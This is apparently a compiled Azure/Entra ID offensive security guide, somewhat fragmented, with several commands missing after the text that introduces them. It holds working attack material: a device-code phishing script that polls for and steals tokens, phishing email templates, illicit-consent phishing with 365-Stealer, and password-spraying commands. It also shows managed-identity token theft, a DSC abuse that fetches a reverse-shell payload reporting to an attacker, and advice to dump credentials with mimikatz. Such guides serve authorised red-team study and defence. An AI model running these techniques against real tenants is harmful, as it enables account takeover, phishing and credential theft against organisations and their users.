AzureAD section.
One of the first things you need to know is who you are (in which
environment you are):
az cli
az account list
az account tenant list # Current tenant info
az account subscription list # Current subscription info
az ad signed-in-user show # Current signed-in user
az ad signed-in-user list-owned-objects # Get owned objects by current user
az account management-group list #Not allowed by default
AzureAD
#Get the current session state
Get-AzureADCurrentSessionInfo
#Get details of the current tenant
Get-AzureADTenantDetail
Az PowerShell
AzureAD Enumeration
By default, any user should have enough permissions to enumerate things such as users, groups, roles, service principals... (check default AzureAD permissions).\ You can find here a guide:
az-azuread.md
Now that you have some information about your credentials (and if you are a red team hopefully you haven't been detected), it's time to figure out which services are being used in the environment.\ In the following section you can check some ways to enumerate some common services.
Service Principal and Access Policy
An Azure service can have a System Identity (of the service itself) or use a
User Assigned Managed Identity. This Identity can have Access Policy to,
for example, a KeyVault to read secrets. These Access Policies should be
restricted (least privilege principle), but might have more permissions than
required. Typically an App Service would use KeyVault to retrieve secrets
and certificates.
cd ROADTools
pipenv shell
roadrecon auth -u [email protected] -p "Welcome2022!"
roadrecon gather
roadrecon gui
Stormspotter
# Start Backend
cd stormspotter\backend\
pipenv shell
python ssbackend.pyz
# Start Front-end
cd stormspotter\frontend\dist\spa\
quasar.cmd serve -p 9091 --history
# Run Stormcollector
cd stormspotter\stormcollector\
pipenv shell
az login -u [email protected] -p Welcome2022!
python stormspotter\stormcollector\sscollector.pyz cli
# This will generate a .zip file to upload in the frontend (127.0.0.1:9091)
AzureHound
# You need to use the Az PowerShell and Azure AD modules:
$passwd = ConvertTo-SecureString "Welcome2022!" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential ("[email protected]", $passwd)
Connect-AzAccount -Credential $creds
Import-Module AzureAD\AzureAD.psd1
Connect-AzureAD -Credential $creds
# Launch AzureHound
. AzureHound\AzureHound.ps1
Invoke-AzureHound -Verbose
# Simple queries
## All Azure Users
MATCH (n:AZUser) return n.name
## All Azure Applications
MATCH (n:AZApp) return n.objectid
## All Azure Devices
MATCH (n:AZDevice) return n.name
## All Azure Groups
MATCH (n:AZGroup) return n.name
## All Azure Key Vaults
MATCH (n:AZKeyVault) return n.name
## All Azure Resource Groups
MATCH (n:AZResourceGroup) return n.name
## All Azure Service Principals
MATCH (n:AZServicePrincipal) return n.objectid
## All Azure Virtual Machines
MATCH (n:AZVM) return n.name
## All Principals with the ‘Contributor’ role
MATCH p = (n)-[r:AZContributor]->(g) RETURN p
# Advanced queries
## Get Global Admins
MATCH p =(n)-[r:AZGlobalAdmin*1..]->(m) RETURN p
## Owners of Azure Groups
MATCH p = (n)-[r:AZOwns]->(g:AZGroup) RETURN p
## All Azure Users and their Groups
MATCH p=(m:AZUser)-[r:MemberOf]->(n) WHERE NOT m.objectid CONTAINS 'S-1-5' RETURN p
## Privileged Service Principals
MATCH p = (g:AZServicePrincipal)-[r]->(n) RETURN p
## Owners of Azure Applications
MATCH p = (n)-[r:AZOwns]->(g:AZApp) RETURN p
## Paths to VMs
MATCH p = (n)-[r]->(g: AZVM) RETURN p
## Paths to KeyVault
MATCH p = (n)-[r]->(g:AZKeyVault) RETURN p
## Paths to Azure Resource Group
MATCH p = (n)-[r]->(g:AZResourceGroup) RETURN p
## On-Prem users with edges to Azure
MATCH p=(m:User)-[r:AZResetPassword|AZOwns|AZUserAccessAdministrator|AZContributor|AZAddMembers|AZGlobalAdmin|AZVMContributor|AZOwns|AZAvereContributor]->(n) WHERE m.objectid CONTAINS 'S-1-5-21' RETURN p
## All Azure AD Groups that are synchronized with On-Premise AD
MATCH (n:Group) WHERE n.objectid CONTAINS 'S-1-5' AND n.azsyncid IS NOT NULL RETURN n
Azucar
# You should use an account with at least read-permission on the assets you want to access
git clone https://github.com/nccgroup/azucar.git
PS> Get-ChildItem -Recurse c:\Azucar_V10 | Unblock-File
MicroBurst
Import-Module .\MicroBurst.psm1
Import-Module .\Get-AzureDomainInfo.ps1
Get-AzureDomainInfo -folder MicroBurst -Verbose
PowerZure
Connect-AzAccount
ipmo C:\Path\To\Powerzure.psd1
Get-AzureTarget
# Reader
$ Get-Runbook, Get-AllUsers, Get-Apps, Get-Resources, Get-WebApps, Get-WebAppDetails
# Contributor
$ Execute-Command -OS Windows -VM Win10Test -ResourceGroup Test-RG -Command "whoami"
$ Execute-MSBuild -VM Win10Test -ResourceGroup Test-RG -File "build.xml"
$ Get-AllSecrets # AllAppSecrets, AllKeyVaultContents
$ Get-AvailableVMDisks, Get-VMDisk # Download a virtual machine's disk
# Owner
$ Set-Role -Role Contributor -User [email protected] -Resource Win10VMTest
# Administrator
$ Create-Backdoor, Execute-Backdoor
Management Groups
If your organization has many Azure subscriptions, you may need a way to efficiently manage access, policies, and compliance for those subscriptions. Management groups provide a governance scope above subscriptions.
Azure Subscriptions
An Azure subscription is a logical container used to provision related
business or technical resources in Azure. It holds the details of all your
resources like virtual machines (VMs), databases, and more. When you
create an Azure resource like a VM, you identify the subscription it
belongs to. It allows you to delegate access through role-based access-
control mechanisms.
Resource Groups
A resource group is a container that holds related resources for an Azure
solution. The resource group can include all the resources for the solution,
or only those resources that you want to manage as a group. Generally,
add resources that share the same lifecycle to the same resource group so
you can easily deploy, update, and delete them as a group.
All the resources must be inside a resource group and can belong only to
a group and if a resource group is deleted, all the resources inside it are also
deleted.
Administrative Units
Administrative units let you subdivide your organization into any unit that
you want, and then assign specific administrators that can manage only
the members of that unit. For example, you could use administrative units
to delegate permissions to administrators of each school at a large
university, so they could control access, manage users, and set policies only
in the School of Engineering.
Roles assigned to groups are inherited by all the members of the group. Depending on the scope the role was assigned to, the role could be inherited by other resources inside the scope container. For example, if a user A has a role on the subscription, he will have that role on all the resource groups inside the subscription and on all the resources inside the resource groups.
Classic Roles
Owner: Full access to all resources; can manage access for other users. Applies to all resource types.
Reader: View all resources. Applies to all resource types.
User Access Administrator: View all resources; can manage access for other users. Applies to all resource types.
Built-In roles
Azure role-based access control (Azure RBAC) has several Azure built-in
roles that you can assign to users, groups, service principals, and
managed identities. Role assignments are the way you control access to
Azure resources. If the built-in roles don't meet the specific needs of your
organization, you can create your own Azure custom roles.
Built-In roles apply only to the resources they are meant for. For example, check these 2 examples of Built-In roles over Compute resources:
Custom Roles
Azure also allows the creation of custom roles with the permissions the user needs.
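A hedged sketch of building a custom role with Az PowerShell by cloning an existing definition (role name, action and subscription id are placeholders):
# Clone an existing role definition and trim it down to the needed permission
$role = Get-AzRoleDefinition "Virtual Machine Contributor"
$role.Id = $null
$role.Name = "Custom VM Starter"
$role.Description = "Can only start VMs"
$role.Actions.Clear()
$role.Actions.Add("Microsoft.Compute/virtualMachines/start/action")
$role.AssignableScopes.Clear()
$role.AssignableScopes.Add("/subscriptions/<subscription_id>")
New-AzRoleDefinition -Role $role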
Permission Denied
In order for a principal to have some access over a resource, an explicit role granting that permission must have been assigned to him (in any way).
An explicit deny role assignment takes precedence over the role granting the permission.
Global Administrator
Users with the Global Administrator role have the ability to 'elevate' to the User Access Administrator Azure role on the root management group. This means that a Global Administrator will be able to manage access to all Azure subscriptions and management groups.
This elevation can be done at the end of the page:
https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/~/Properties
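The same elevation can also be triggered through the ARM elevateAccess REST endpoint; a minimal sketch, assuming you hold an ARM token for a Global Administrator:
# Toggle "Access management for Azure resources" via the ARM API
$Token = (Get-AzAccessToken).Token
$RequestParams = @{
    Method  = 'POST'
    Uri     = 'https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01'
    Headers = @{ 'Authorization' = "Bearer $Token" }
}
Invoke-RestMethod @RequestParams
# Afterwards the Global Admin should appear as User Access Administrator at root scope
Get-AzRoleAssignment -RoleDefinitionName "User Access Administrator"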
You can see the full list of default permissions of users in the docs.
Moreover, note that in that list you can also see the guests default
permissions list.
**[Access Tokens](https://learn.microsoft.com/en-us/azure/active-directory/develop/access-tokens)**: The client presents this token to the resource server to access resources. It can be used only for a specific combination of user, client, and resource and cannot be revoked until expiry - that is 1 hour by default. Detection is low using this.
ID Tokens: The client receives this token from the authorization
server. It contains basic information about the user. It is bound to a
specific combination of user and client.
Refresh Tokens: Provided to the client with access token. Used to get
new access and ID tokens. It is bound to a specific combination of
user and client and can be revoked. Default expiry is 90 days for
inactive refresh tokens and no expiry for active tokens.
Information for conditional access is stored inside the JWT. So, if you
request the token from an allowed IP address, that IP will be stored in
the token and then you can use that token from a non-allowed IP to access
the resources.
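A quick way to inspect which claims (IP address, amr, scp...) ended up inside a token is to base64url-decode its payload; a minimal PowerShell sketch (the token value is a placeholder):
# Decode the JWT payload to review the embedded claims
$Token = 'eyJ0eX...'
$payload = $Token.Split('.')[1].Replace('-', '+').Replace('_', '/')
while ($payload.Length % 4) { $payload += '=' }
[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($payload)) | ConvertFrom-Json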
Check the following page to learn different ways to request access tokens
and login with them:
az-azuread.md
The most common API endpoints are:
| API | Information |
| --- | ----------- |
| login.microsoftonline.com/<domain>/.well-known/openid-configuration | Login information, including tenant ID |
| autodiscover-s.outlook.com/autodiscover/autodiscover.svc | All domains of the tenant |
| login.microsoftonline.com/GetUserRealm.srf?login=<UserName> | Login information of the tenant, including tenant Name and domain authentication type |
| login.microsoftonline.com/common/GetCredentialType | Login information, including Desktop SSO information |
You can query all the information of an Azure tenant with just one
command of the AADInternals library:
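The command in question is the AADInternals outsider recon function; a sketch with a placeholder domain:
# Recon an Azure tenant as an unauthenticated outsider
Invoke-AADIntReconAsOutsider -DomainName company.com | Format-Table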
From the output we can see the tenant information of the target
organisation, including the tenant name, id and the "brand" name. We can
also see whether the Desktop SSO (aka Seamless SSO) is enabled. If
enabled, we can find out whether a given user exists in the target
organisation or not (user enumeration).
We can also see the names of all (verified) domains and their identity types
of the target tenant. For federated domains, the FQDN of the used identity
provider (usually ADFS server) is also shown. The MX column indicates
whether the email is sent to Exchange Online or not. The SPF column
indicates whether Exchange online is listed as an email sender. Note!
Currently the recon function does not follow the include statements of SPF
records, so there can be false-negatives.
User Enumeration
It's possible to check if a username exists inside a tenant. This includes
also guest users, whose username is in the format:
<email>#EXT#@<tenant name>.onmicrosoft.com
With AADInternals, you can easily check if the user exists or not:
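A sketch of that check (the username is a placeholder):
# Check whether a single user exists in the target tenant
Invoke-AADIntUserEnumerationAsOutsider -UserName "[email protected]"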
Output:
UserName Exists
-------- ------
[email protected] True
You can also use a text file containing one email address per row:
[email protected]
[email protected]
[email protected]
[email protected]
external.user_gmail.com#EXT#@company.onmicrosoft.com
external.user_outlook.com#EXT#@company.onmicrosoft.com
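Assuming the list above is saved as users.txt, the same AADInternals function can be fed from the pipeline (a sketch; the -Method values are described in the table below):
# Enumerate every user in the file
Get-Content .\users.txt | Invoke-AADIntUserEnumerationAsOutsider -Method Normal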
| Method | Description |
| ------ | ----------- |
| Normal | This refers to the GetCredentialType API mentioned above. The default method. |
| Login | This method tries to log in as the user. Note: queries will be logged to the sign-ins log. |
After discovering the valid usernames you can get info about a user with:
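One option (a hedged sketch using AADInternals; the username is a placeholder):
# Get login/realm information for a discovered user
Get-AADIntLoginInformation -UserName [email protected]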
You can use a method from MicroBurst for this goal. This function will search the base domain name (and a few permutations) in several Azure service domains:
Import-Module .\MicroBurst\MicroBurst.psm1
Invoke-EnumerateAzureBlobs -Base corp
[...]
https://corpcommon.blob.core.windows.net/secrets?
restype=container&comp=list
[...]
# Access https://corpcommon.blob.core.windows.net/secrets?
restype=container&comp=list
# Check: <Name>ssh_info.json</Name>
# Access then
https://corpcommon.blob.core.windows.net/secrets/ssh_info.json
SAS URLs
A shared access signature (SAS) URL is a URL that provides access to a certain part of a Storage account (it could be a full container, a single file...) with some specific permissions (read, write...) over the resources. If you find one leaked you could be able to access sensitive information. They look like this (this one grants access to a container; if it only granted access to a file, the path of the URL would also contain that file):
https://<storage_account_name>.blob.core.windows.net/newcontainer?
sp=r&st=2021-09-26T18:15:21Z&se=2021-10-
27T02:14:21Z&spr=https&sv=2021-07-
08&sr=c&sig=7S%2BZySOgy4aA3Dk0V1cJyTSIf1cW%2Fu3WFkhHV32%2B4PE%3D
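A minimal sketch of consuming a leaked SAS token with the Az.Storage module (account, container and token values are placeholders):
# Build a storage context from the SAS token (everything after the '?')
$ctx = New-AzStorageContext -StorageAccountName <storage_account_name> -SasToken "sp=r&st=...&sig=..."
# List and download the blobs the SAS grants access to
Get-AzStorageBlob -Container newcontainer -Context $ctx
Get-AzStorageBlobContent -Container newcontainer -Blob <blob_name> -Destination . -Context $ctx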
Only permissions that don't require admin consent are classified as low impact. The permissions required for basic sign-in are openid, profile, email, User.Read and offline_access. If an organization allows user consent for all apps, an employee can grant consent to an app to read the above from their profile.
PS AzureADPreview> (Get-AzureADMSAuthorizationPolicy).PermissionGrantPolicyIdsAssignedToDefaultUserRole
In simple words, when the victim clicks on that beautiful blue "Accept" button, Azure AD sends a token to the third party site belonging to the attacker, who will use the token to perform actions on behalf of the victim, like accessing all the files, reading mails, sending mails, etc.
Attack Flow
To perform this attack against the company "ecorp", the attacker could register a domain with the name "safedomainlogin.com" and create a subdomain "ecorp.safedomainlogin.com" where they host the application that captures the authorization code and requests the access tokens.
The attacker then creates a link containing the client id of the malicious application and shares it with the targeted users to obtain their consent.
365-Stealer
You can perform this attack with 365-Stealer.
As an extra step, if you have some access over a user in the victim organisation, you can check if the policy will allow them to consent to apps:
Import-Module .\AzureADPreview\AzureADPreview.psd1
$passwd = ConvertTo-SecureString "Welcome2022!" -AsPlainText -
Force
$creds = New-Object System.Management.Automation.PSCredential
("[email protected]", $passwd)
Connect-AzureAD -Credential $creds
(Get-
AzureADMSAuthorizationPolicy).PermissionGrantPolicyIdsAssignedT
oDefaultUserRole
# If "ManagePermissionGrantsForSelf.microsoft-user-default-
legacy", he can
For this attack you will need to create a new App in your Azure Tenant
with, for example, the following permissions:
Check https://www.alteredsecurity.com/post/introduction-to-365-stealer to
learn how to configure it.
Note that the obtained access token will be for the graph endpoint with the scopes User.Read and User.ReadBasic.All (the requested permissions). You won't be able to perform other actions (but those are enough to download info about all the users in the org).
Post-Exploitation
Once you got access to the user you can do things such as stealing sensitive
documents and even uploading backdoored document files.
References
This post was copied from
https://www.alteredsecurity.com/post/introduction-to-365-stealer
https://login.microsoftonline.com/common/oauth2/devicecode?
api-version=1.0
| Parameter | Value |
| --------- | ----- |
| client_id | d3590ed6-52b3-4102-aeff-aad2292ab01c |
| resource | https://graph.windows.net |
{
"user_code": "CLZ8HAV2L",
"device_code": "CAQABAAEAAAB2UyzwtQEKR7-
rWbgdcBZIGm0IlLxBn23EWIrgw7fkNIKyMdS2xoEg9QAntABbI5ILrinFM2ze8d
VKdixlThVWfM8ZPhq9p7uN8tYIuMkfVJ29aUnUBTFsYCmJCsZHkIxtmwdCsIlKp
OQij2lJZzphfZX8j0nktDpaHVB0zm-vqATogllBjA-t_ZM2B0cgcjQgAA",
"verification_url": "https://microsoft.com/devicelogin",
"expires_in": "900",
"interval": "5",
"message": "To sign in, use a web browser to open the page
https://microsoft.com/devicelogin and enter the code CLZ8HAV2L
to authenticate."
}
| Parameter | Description |
| --------- | ----------- |
| user_code | The code a user will enter when requested |
| device_code | The device code used to "poll" for the authentication result |
| verification_url | The URL the user needs to browse to for authentication |
| expires_in | The expiration time in seconds (15 minutes) |
| interval | The interval in seconds at which the client should poll for authentication |
| message | The pre-formatted message to be shown to the user |
$body=@{
"client_id" = "d3590ed6-52b3-4102-aeff-aad2292ab01c"
"resource" = "https://graph.windows.net"
}
Note! I'm using version 1.0, which is a little bit different from the v2.0 flow used in the documentation.
2. Creating a phishing email
Now that we have the verification_url (always the same) and user_code
we can create and send a phishing email.
# Create a message
$message = @"
<html>
Hi!<br>
Here is the link to the <a
href="https://microsoft.com/devicelogin">document</a>. Use the
following code to access: <b>$user_code</b>. <br><br>
</html>
"@
Note! If the user is not logged in, the user needs to log in using whatever
methods the target organisation is using.
After successful authentication, the following is shown to the user.
:warning: At this point the identity of the user is compromised! :warning:
https://login.microsoftonline.com/Common/oauth2/token?api-
version=1.0
The request must include the following parameters (code is the device_code
from the step 1)
| Parameter | Value |
| --------- | ----- |
| client_id | d3590ed6-52b3-4102-aeff-aad2292ab01c |
| resource | https://graph.windows.net |
| code | CAQABAAEAAAB2UyzwtQEKR7-rWbgdcBZIGm0IlLxBn23EWIrgw7fkNIKyMdS2xoEg9QA...vqATogllBjA-t_ZM2B0cgcjQgAA (truncated) |
| grant_type | urn:ietf:params:oauth:grant-type:device_code |
After successful login, we'll get the following response (tokens truncated):
{
"token_type": "Bearer",
"scope": "user_impersonation",
"expires_in": "7199",
"ext_expires_in": "7199",
"expires_on": "1602662787",
"not_before": "1602655287",
"resource": "https://graph.windows.net",
"access_token": "eyJ0eXAi...HQOT1rvUEOEHLeQ",
"refresh_token": "0.AAAAxkwD...WxPoK0Iq6W",
"foci": "1",
"id_token": "eyJ0eXAi...widmVyIjoiMS4wIn0."
}
The following script connects to the Azure AD token endpoint and polls for
authentication status.
$continue = $true
$interval = $authResponse.interval
$expires = $authResponse.expires_in
$body=@{
"client_id" = "d3590ed6-52b3-4102-aeff-aad2292ab01c"
"grant_type" = "urn:ietf:params:oauth:grant-
type:device_code"
"code" = $authResponse.device_code
"resource" = "https://graph.windows.net"
}
while($continue)
{
Start-Sleep -Seconds $interval
$total += $interval
try
{
$response = Invoke-RestMethod -UseBasicParsing -Method
Post -Uri
"https://login.microsoftonline.com/Common/oauth2/token?api-
version=1.0 " -Body $body -ErrorAction SilentlyContinue
}
catch
{
# This is normal flow, always returns 40x unless
successful
$details=$_.ErrorDetails.Message | ConvertFrom-Json
$continue = $details.error -eq "authorization_pending"
Write-Host $details.error
if(!$continue)
{
# Not pending so this is a real error
Write-Error $details.error_description
return
}
}
if($response)
{
break # Exit the loop
}
}
We can also get access tokens to other services using the refresh token as
long as the client_id remains the same.
$body=@{
"client_id" = "d3590ed6-52b3-4102-aeff-aad2292ab01c"
"grant_type" = "refresh_token"
"scope" = "openid"
"resource" = "https://outlook.office365.com"
"refresh_token" = $response.refresh_token
}
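The token request itself follows the same pattern as before against the v1.0 token endpoint; a sketch that stores the result in the variable used below:
# Redeem the refresh token for an Outlook access token
$EXOresponse = Invoke-RestMethod -UseBasicParsing -Method Post -Uri "https://login.microsoftonline.com/Common/oauth2/token?api-version=1.0" -Body $body
$EXOresponse.access_token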
Send-AADIntOutlookMessage -AccessToken
$EXOresponse.access_token -Recipient
"[email protected]" -Subject "Overdue payment" -Message
"Pay this <h2>asap!</h2>"
Using AADInternals for phishing
AADInternals (v0.4.4 or later) has an Invoke-AADIntPhishing function
which automates the phishing process.
Email
The following example sends a phishing email using a customised message.
The tokens are saved to the cache.
Invoke-AADIntPhishing -Recipients "[email protected]","[email protected]" -Subject "Johnny shared a document with you" -Sender "Johnny Carson <[email protected]>" -SMTPServer smtp.myserver.local -Message $message -SaveToCache
Code: CKDZ2BURF
Mail sent to: [email protected]
...
Received access token for [email protected]
And now we can send email as the victim using the cached token.
Send-AADIntOutlookMessage -Recipient
"[email protected]" -Subject "Overdue payment" -Message
"Pay this <h2>asap!</h2>"
We can also send a Teams message to make the payment request more
urgent:
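The cached token can be reused with the AADInternals Teams cmdlet; a hedged sketch (recipient and message are illustrative):
# Send a Teams chat message as the compromised user
Send-AADIntTeamsMessage -Recipients "[email protected]" -Message "Remember to pay this asap!"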
Sent MessageID
---- ---------
16/10/2020 14.40.23 132473328207053858
The following video shows how to use AADInternals for email phishing.
Teams
AADInternals supports sending phishing messages as Teams chat messages.
Note! After the victim has "authenticated" and the tokens are received, AADInternals will replace the original message. This replacement message can be provided with the -CleanMessage parameter.
Get-AADIntAccessTokenForAzureCoreManagement -SaveToCache
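The Teams phishing itself is then launched with the phishing function in Teams mode; a sketch of the likely invocation (recipient and message variables are placeholders):
# Send the phishing message via Teams using the cached token
Invoke-AADIntPhishing -Recipients "[email protected]" -Teams -Message $message -CleanMessage $cleanMessage -SaveToCache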
Code: CKDZ2BURF
Teams message sent to: [email protected]. Message id:
132473151989090816
...
Received access token for [email protected]
However, the access tokens acquired using the refresh token do not appear in the sign-ins log!
:warning: If there are indications that the user is signing in from non-typical
locations, the user account might be compromised.
Preventing
The only effective way for preventing phishing using this technique is to
use Conditional Access (CA) policies. To be specific, the phishing can not
be prevented, but we can prevent users from signing in based on certain
rules. Especially the location and device state based policies are effective
for protecting accounts. This applies to all the phishing techniques currently used.
However, it is not possible to cover all scenarios. For instance, forcing MFA
for logins from illicit locations does not help if the user is logging in using
MFA.
Mitigating
If the user has been compromised, the user’s refresh tokens can be revoked,
which prevents attacker getting new access tokens with the compromised
refresh token.
Summary
As far as I know, the device code authentication flow technique has not been used for phishing before.
From the attacker point of view, this method has a couple of pros:
From the attacker point of view, this method has at least one con:
Of course, the attacker can minimise the time restriction by sending the
phishing email to multiple recipients - this will increase the probability that
someone signs in using the code.
Another way is to implement a proxy which would start the authentication
when the link is clicked (credits to @MrUn1k0d3r). However, this way the
advantage of using a legit microsoft.com url would be lost.
However, note that this technique is very noisy and Blue Team can easily
catch it. Moreover, forced password complexity and the use of MFA can
make this technique kind of useless.
. .\MSOLSpray\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\validemails.txt -Password
Welcome2022! -Verbose
Or with o365spray
Or with MailSniper
#OWA
Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList
.\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-
sprayed-creds.txt
#EWS
Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList
.\userlist.txt -Password Spring2021 -Threads 15 -OutFile
sprayed-ews-creds.txt
#Gmail
Invoke-PasswordSprayGmail -UserList .\userlist.txt -Password
Fall2016 -Threads 15 -OutFile gmail-sprayed-creds.txt
Raw requests
secret:$IDENTITY_HEADER'); .
Then query the Azure REST API to get the subscription ID and more .
$Token = 'eyJ0eX..'
$URI = 'https://management.azure.com/subscriptions?api-
version=2020-01-01'
# $URI = 'https://graph.microsoft.com/v1.0/applications'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value
1. After the user has accessed the application through an endpoint, the
user is directed to the Azure AD sign-in page.
2. After a successful sign-in, Azure AD sends a token to the user's client
device.
3. The client sends the token to the Application Proxy service, which
retrieves the user principal name (UPN) and security principal name
(SPN) from the token. Application Proxy then sends the request to
the Application Proxy connector.
4. If you have configured single sign-on, the connector performs any
additional authentication required on behalf of the user.
5. The connector sends the request to the on-premises application.
6. The response is sent through the connector and Application Proxy
service to the user.
Enumeration
# Enumerate applications with application proxy configured
Get-AzureADApplication | %{try{Get-AzureADApplicationProxyApplication -ObjectId $_.ObjectID; $_.DisplayName; $_.ObjectID}catch{}}
History
If you can access it, you can have info about resources that are not present
but might be deployed in the future. Moreover, if a parameter containing
sensitive info was marked as "String" instead of "SecureString", it will be
present in clear-text.
Search Sensitive Info
Users with the permissions Microsoft.Resources/deployments/read and
Microsoft.Resources/subscriptions/resourceGroups/read can read the
deployment history.
Get-AzResourceGroup
Get-AzResourceGroupDeployment -ResourceGroupName <name>
# Export
Save-AzResourceGroupDeploymentTemplate -ResourceGroupName
<RESOURCE GROUP> -DeploymentName <DEPLOYMENT NAME>
cat <DEPLOYMENT NAME>.json # search for hardcoded password
cat <PATH TO .json FILE> | Select-String password
References
https://app.gitbook.com/s/5uvPQhxNCPYYTqpRwsuS/~/changes/arg
Ksv1NUBY9l4Pd28TU/pentesting-cloud/azure-security/az-
services/az-arm-templates#references
These are like "scheduled tasks" in Azure that will let you execute things
(actions or even scripts) to manage, check and configure the Azure
environment.
Run As Account
When Run as Account is used, it creates an Azure AD application with
self-signed certificate, creates a service principal and assigns the
Contributor role for the account in the current subscription (a lot of
privileges).\ Microsoft recommends using a Managed Identity for
Automation Account.
This will be removed on September 30, 2023 and changed for Managed
Identities.
Compromise Runbooks & Jobs
Runbooks allow you to execute arbitrary PowerShell code. This could be abused by an attacker to steal the permissions of the attached principal (if any). In the code of Runbooks you could also find sensitive info (such as creds).
If you can read the jobs, do it, as they contain the output of the run (potentially sensitive info).
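A minimal enumeration sketch with the Az.Automation cmdlets (account, resource group, runbook and job ids are placeholders):
# List automation accounts, runbooks and export their source code
Get-AzAutomationAccount
Get-AzAutomationRunbook -AutomationAccountName <account> -ResourceGroupName <rg>
Export-AzAutomationRunbook -AutomationAccountName <account> -ResourceGroupName <rg> -Name <runbook> -Slot Published -OutputFolder .
# Review job history and output (may contain sensitive data)
Get-AzAutomationJob -AutomationAccountName <account> -ResourceGroupName <rg>
Get-AzAutomationJobOutput -AutomationAccountName <account> -ResourceGroupName <rg> -Id <job_id> -Stream Any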
Hybrid Worker
A Runbook can be run in a container inside Azure or in a Hybrid
Worker.\ The Log Analytics Agent is deployed on the VM to register it as
a hybrid worker.\ The hybrid worker jobs run as SYSTEM on Windows and
nxautomation account on Linux.\ Each Hybrid Worker is registered in a
Hybrid Worker Group.
RCE
It's possible to abuse SC to run arbitrary scripts in the managed machines.
az-state-configuration-rce.md
Enumeration
# Check user right for automation
az extension add --upgrade -n automation
az automation account list # if it doesn't return anything the
user is not a part of an Automation group
Create a Runbook
# Get the role of a user on the Automation account
# Contributor or higher = Can create and execute Runbooks
Get-AzRoleAssignment -Scope /subscriptions/<ID>/resourceGroups/<RG-NAME>/providers/Microsoft.Automation/automationAccounts/<AUTOMATION-ACCOUNT>
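If the role check passes, a hedged sketch of importing and running your own runbook (names and paths are placeholders):
# Import, publish and start a PowerShell runbook
Import-AzAutomationRunbook -Path .\evil.ps1 -Name EvilRunbook -Type PowerShell -AutomationAccountName <account> -ResourceGroupName <rg>
Publish-AzAutomationRunbook -Name EvilRunbook -AutomationAccountName <account> -ResourceGroupName <rg>
Start-AzAutomationRunbook -Name EvilRunbook -AutomationAccountName <account> -ResourceGroupName <rg> # add -RunOn <HybridWorkerGroup> to run it on a hybrid worker
# Read the job output
Get-AzAutomationJobOutput -AutomationAccountName <account> -ResourceGroupName <rg> -Id <job_id> -Stream Output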
These files will serve as a template. You’ll need to fill in the variable
names and parameters with what you’re using. This includes the
resource names, file paths, and the external server/payload names that
you’re using. Please refer to the comments in the code.
wget
https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/maste
r/RevPS.ps1
We need to edit the reverse-shell script by adding our parameters, so the Windows VM knows where to connect back to once it's executed. In my case I add the following:
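A purely hypothetical illustration of that edit (the real parameter names are documented in the comments of RevPS.ps1; the IP and port below are invented):
# Hypothetical listener values added to the reverse-shell script
$attackerIp   = "10.10.10.10"   # placeholder listener IP
$attackerPort = 443             # placeholder listener port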
We see that the scheduled task has run and our payload was retrieved and
executed in memory with SYSTEM level privileges!
Wrapping Up
This now opens the door for many possibilities. Since we have a shell
running as SYSTEM, we can dump credentials with mimikatz (potentially
risky depending on how mature the EDR is for cloud resources). If you
dump creds , there's a good chance that these can be reused elsewhere
across different resources. Lastly, a big takeaway is that instead of limiting
this to one VM, you now have the ability to potentially apply this
configuration across multiple VM’s.
On that note, this concludes our Azure Automation DSC adventures! I hope
you had fun, learned a lot and continue to expand with your own creativity.
Enumeration
For this enumeration you can use the az cli tool, the PowerShell module
AzureAD (or AzureAD Preview) and the Az PowerShell module.
Connection
az cli
az login #This will open the browser
az login -u <username> -p <password> #Specify user and password
az login --identity #Use the current machine managed identity
az login --identity -u
/subscriptions/<subscriptionId>/resourcegroups/myRG/providers/M
icrosoft.ManagedIdentity/userAssignedIdentities/myID #Login
with user managed identity
# Login as service principal
az login --service-principal -u http://azure-cli-2016-08-05-14-
31-15 -p VerySecret --tenant contoso.onmicrosoft.com #With
password
az login --service-principal -u http://azure-cli-2016-08-05-14-
31-15 -p ~/mycertfile.pem --tenant contoso.onmicrosoft.com
#With cert
# Help
az find "vm" # Find vm commands
az vm -h # Get subcommands
az ad user list --query-examples # Get examples
Azure AD
Connect-AzureAD #Open browser
# Using credentials
$passwd = ConvertTo-SecureString "Welcome2022!" -AsPlainText -
Force
$creds = New-Object System.Management.Automation.PSCredential
("[email protected]", $passwd)
Connect-AzureAD -Credential $creds
# Using tokens
## AzureAD cannot request tokens, but can use AADGraph and
MSGraph tokens to connect
Connect-AzureAD -AccountId [email protected] -
AadAccessToken $token
Az PowerShell
Connect-AzAccount #Open browser
# Using credentials
$passwd = ConvertTo-SecureString "Welcome2022!" -AsPlainText -
Force
$creds = New-Object System.Management.Automation.PSCredential
("[email protected]", $passwd)
Connect-AzAccount -Credential $creds
Raw PS
$Token = 'eyJ0eXAi..'
# List subscriptions
$URI = 'https://management.azure.com/subscriptions?api-
version=2020-01-01'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value
# Vault
curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-
version=2017-09-01" -H secret:$IDENTITY_HEADER
Users
az cli
# Enumerate users
az ad user list --output table
az ad user list --query "[].userPrincipalName"
# Get info of 1 user
az ad user show --id "[email protected]"
# Search "admin" users
az ad user list --query "[].displayName" | findstr /i "admin"
az ad user list --query "[?
contains(displayName,'admin')].displayName"
# Search attributes containing the word "password"
az ad user list | findstr /i "password" | findstr /v "null,"
# All users from AzureAD
az ad user list --query "[].
{osi:onPremisesSecurityIdentifier,upn:userPrincipalName}[?
osi==null]"
az ad user list --query "[?
onPremisesSecurityIdentifier==null].displayName"
# All users synced from on-prem
az ad user list --query "[].
{osi:onPremisesSecurityIdentifier,upn:userPrincipalName}[?
osi!=null]"
az ad user list --query "[?
onPremisesSecurityIdentifier!=null].displayName"
# Get groups where the user is a member
az ad user get-member-groups --id <email>
# Get roles assigned to the user
az role assignment list --include-groups --include-classic-
administrators true --assignee <email>
Azure AD
# Enumerate Users
